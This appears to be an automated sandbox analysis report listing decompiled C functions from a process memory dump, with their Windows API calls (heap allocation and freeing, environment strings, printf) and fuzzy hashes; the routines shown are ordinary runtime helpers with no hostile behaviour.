                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsnicmp
                                                      • String ID: /-Y
                                                      • API String ID: 1886669725-4274875248
                                                      • Opcode ID: 3553890fc15ac658f4d57ddcc5168b807ffef9d8b989c3f5954676d9bbbb7f60
                                                      • Instruction ID: b47fd822746465cf91f502a3498a733b0c80af2bac7111e5be99f7045d8f4063
                                                      • Opcode Fuzzy Hash: 3553890fc15ac658f4d57ddcc5168b807ffef9d8b989c3f5954676d9bbbb7f60
                                                      • Instruction Fuzzy Hash: 02115B3951DA20B7D7708A0984503F77FB4AF41255B134291ECC19B443D3259E1ED3A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E4A74F1B6(void* __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
                                                      				signed int _v8;
                                                      				void* _t17;
                                                      				void* _t26;
                                                      				signed int _t29;
                                                      
                                                      				_t29 = __edx;
                                                      				_t28 = __ecx;
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				if((_a4 | _a8) == 0) {
                                                      					_v8 = _v8 & 0x00000000;
                                                      					_t26 = 0x64;
                                                      				} else {
                                                      					_t26 = E4A743E2D(E4A743ED7(_a12, _a16, 0x64, 0), _t29, _a4, _a8);
                                                      					_v8 = _t29;
                                                      				}
                                                      				E4A7399E1(_t28, 0x40002722, 1, E4A739A2C(0x4a74f250, _t26));
                                                      				if( *0x4a7541b4 == 0) {
                                                      					_t17 = 0;
                                                      				} else {
                                                      					E4A7399E1(_t28, 0x40002722, 1, E4A739A2C(0x4a74f250, _t26));
                                                      					printf(0x4a74f24c);
                                                      					_t17 = (0 | _a52 != 0x00000000) + 1;
                                                      				}
                                                      				return _t17;
                                                      			}








                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 4A74F1DF
                                                      • printf.MSVCRT ref: 4A74F22D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                      • String ID: %3d
                                                      • API String ID: 2845598586-2138283368
                                                      • Opcode ID: b0b5767a206c266adf48fbdcdcc0ef20af0b5cc6e6a578a2124a82c50b7ce556
                                                      • Instruction ID: 102e22fb172cfaa95b1ae5a86197af61fbd6f14c28b74254652226c63c068e15
                                                      • Opcode Fuzzy Hash: b0b5767a206c266adf48fbdcdcc0ef20af0b5cc6e6a578a2124a82c50b7ce556
                                                      • Instruction Fuzzy Hash: 9501F571558109BBEB319B60CC46FEF3AADDB84B60F118014F704A90C2D2B6AE58C375
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A73694B(intOrPtr _a4) {
                                                      				intOrPtr _t11;
                                                      				signed int _t12;
                                                      				int _t13;
                                                      				signed short _t15;
                                                      				intOrPtr _t31;
                                                      				void* _t32;
                                                      				void* _t37;
                                                      				void* _t43;
                                                      
                                                      				_t31 = _a4;
                                                      				if(_t31 == 0) {
                                                      					L7:
                                                      					return _t11;
                                                      				}
                                                      				_t2 = _t31 + 0x14; // 0x0
                                                      				_t11 =  *_t2;
                                                      				if(_t11 == 0) {
                                                      					goto L7;
                                                      				}
                                                      				_t12 = _t11 - 1;
                                                      				 *(_t31 + 0x14) = _t12;
                                                      				_t5 = _t12 * 4; // 0x4a7542a0
                                                      				_t13 = _t31 + _t5 + 0x90;
                                                      				_t37 =  *_t13;
                                                      				 *_t13 =  *_t13 & 0x00000000;
                                                      				if(_t37 != 0) {
                                                      					_t15 =  *( *_t37) & 0x0000ffff;
                                                      					if(_t15 >= 0x61) {
                                                      						if(_t15 <= 0x7a) {
                                                      							_t15 = _t15 + 0xffffffe0;
                                                      						}
                                                      					}
                                                      					_t43 =  *0x4a755260 - (_t15 & 0x0000ffff); // 0x0
                                                      					if(_t43 != 0) {
                                                      						E4A7400DD(_t32, (_t16 & 0x0000ffff) - 0x40);
                                                      					}
                                                      					E4A737267( *_t37);
                                                      					HeapFree(GetProcessHeap(), 0,  *_t37);
                                                      					E4A736913( *((intOrPtr*)(_t37 + 4)));
                                                      					E4A7369E8( *((intOrPtr*)(_t37 + 4)));
                                                      					 *0x4a754081 =  *((intOrPtr*)(_t37 + 8));
                                                      					 *0x4a754082 =  *((intOrPtr*)(_t37 + 9));
                                                      					_t13 = HeapFree(GetProcessHeap(), 0, _t37);
                                                      				}
                                                      				return _t13;
                                                      			}












                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,0000233F,0000233F,4A76C642,00000000,0000233F,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723), ref: 4A7369A9
                                                      • HeapFree.KERNEL32(00000000,?,4A73DA7E), ref: 4A7369B2
                                                      • GetProcessHeap.KERNEL32(00000000,0000233F,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723,4A76C642,4A731BBC), ref: 4A7369D7
                                                      • HeapFree.KERNEL32(00000000,?,4A73DA7E), ref: 4A7369DA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 5b5e71e8434560815658446dc006cf3c2699fe1302d33f289b2f1da5d4dc4dba
                                                      • Instruction ID: 13286512298704e4349b565a065e64e43781c6b464762600a83b4f89dcf5643a
                                                      • Opcode Fuzzy Hash: 5b5e71e8434560815658446dc006cf3c2699fe1302d33f289b2f1da5d4dc4dba
                                                      • Instruction Fuzzy Hash: 5A1101B2109654AAEB319FA8C885BA77FBCEF45311F02405EE286CB653C229E815D760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E4A73C039(void* __ecx) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				intOrPtr* _t7;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				void* _t20;
                                                      				void* _t24;
                                                      				intOrPtr _t25;
                                                      				void* _t27;
                                                      
                                                      				_push(_t20);
                                                      				_t7 = 0x4a755260;
                                                      				_t1 = _t7 + 2; // 0x4a755262
                                                      				_t24 = _t1;
                                                      				do {
                                                      					_t25 =  *_t7;
                                                      					_t7 = _t7 + 2;
                                                      				} while (_t25 != 0);
                                                      				_t2 = (_t7 - _t24 >> 1) + 1; // 0x4a755263
                                                      				_t27 = _t2;
                                                      				E4A732C56(_t20, _t25, _t27, 0x4a755260, 0x104, 0);
                                                      				_t14 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
                                                      				_v8 = _t14;
                                                      				if(_t14 == 0) {
                                                      					L6:
                                                      					_t15 = 0;
                                                      				} else {
                                                      					E4A73185A(_t14, _t27, 0x4a755260);
                                                      					if(E4A73C0AE(_v8) == 0) {
                                                      						HeapFree(GetProcessHeap(), 0, _v8);
                                                      						goto L6;
                                                      					} else {
                                                      						_t15 = 1;
                                                      					}
                                                      				}
                                                      				return _t15;
                                                      			}














                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,4A755260,00000104,00000000), ref: 4A73C076
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A73C079
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 2d0dba0f4674344be9b99daee626add65c18ef7bff7efb918ee2d40408ee7e4c
                                                      • Instruction ID: e5f69aa307b3ecac89991b833be84c909ad605b733116490fce21ad3a9aa19b6
                                                      • Opcode Fuzzy Hash: 2d0dba0f4674344be9b99daee626add65c18ef7bff7efb918ee2d40408ee7e4c
                                                      • Instruction Fuzzy Hash: 0701D4B260864ABAEA205BA4CC4DFEB3F6CEF41791F060010E505DB142EA60DE18C774
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E4A736FD6(void* __ecx) {
                                                      				long _t4;
                                                      				void* _t9;
                                                      				void* _t12;
                                                      
                                                      				_t9 = __ecx;
                                                      				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                      				if(_t12 == 0) {
                                                      					L4:
                                                      					return 0;
                                                      				}
                                                      				_t4 = E4A7316AD();
                                                      				 *_t12 = _t4;
                                                      				if(_t4 == 0) {
                                                      					HeapFree(GetProcessHeap(), _t4, _t12);
                                                      					_push(0);
                                                      					_push(0x233a);
                                                      					E4A736D44(_t9);
                                                      					goto L4;
                                                      				}
                                                      				return _t12;
                                                      			}







                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000004,?,?,4A737B02,4A738533), ref: 4A736FE4
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A736FE7
                                                        • Part of subcall function 4A7316AD: GetEnvironmentStringsW.KERNEL32(?,?,4A737AF8,4A738533), ref: 4A7316B1
                                                        • Part of subcall function 4A7316AD: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A7316CB
                                                        • Part of subcall function 4A7316AD: HeapAlloc.KERNEL32(00000000), ref: 4A7316D2
                                                        • Part of subcall function 4A7316AD: memcpy.MSVCRT ref: 4A7316E1
                                                        • Part of subcall function 4A7316AD: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A7316EA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 4A745253
                                                      • HeapFree.KERNEL32(00000000), ref: 4A745256
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                                      • String ID:
                                                      • API String ID: 197374240-0
                                                      • Opcode ID: 824d7da1e545e438b7cebc4d82052fc4b3b879d294eb904d495091bcf67cc560
                                                      • Instruction ID: f27f67275b328a15b311d6c2a1d1ec9da3848dd219045f75a2520f5be30082be
                                                      • Opcode Fuzzy Hash: 824d7da1e545e438b7cebc4d82052fc4b3b879d294eb904d495091bcf67cc560
                                                      • Instruction Fuzzy Hash: B9E06DF275961276DB3016BA9C0EB472F6D9BCA7B2F170016B608DA181DE20CC08C738
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A7369E8(void* _a4) {
                                                      				void* _t6;
                                                      
                                                      				_t6 = _a4;
                                                      				HeapFree(GetProcessHeap(), 0,  *_t6);
                                                      				return HeapFree(GetProcessHeap(), 0, _t6);
                                                      			}





                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,4A754210,74EC14B9,0000233F,74EC1499,?,4A7369C4,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000), ref: 4A7369FD
                                                      • HeapFree.KERNEL32(00000000,?,4A7369C4), ref: 4A736A06
                                                      • GetProcessHeap.KERNEL32(00000000,4A754210,?,4A7369C4,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723), ref: 4A736A0B
                                                      • HeapFree.KERNEL32(00000000,?,4A7369C4), ref: 4A736A0E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 6e8aa40710a31f02a2b989bb501b0f0fb893f1cac87a55aab93d6f4e3a97ac18
                                                      • Instruction ID: 3570b3ad08c6f215c6fa73f16266496762c562cd1c0ba5c0aaed3b963c676e64
                                                      • Opcode Fuzzy Hash: 6e8aa40710a31f02a2b989bb501b0f0fb893f1cac87a55aab93d6f4e3a97ac18
                                                      • Instruction Fuzzy Hash: 6DD012B360525C77DA1066DA9C45F577F6CEBC97A2F064022F308C71408571AC10CBB5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%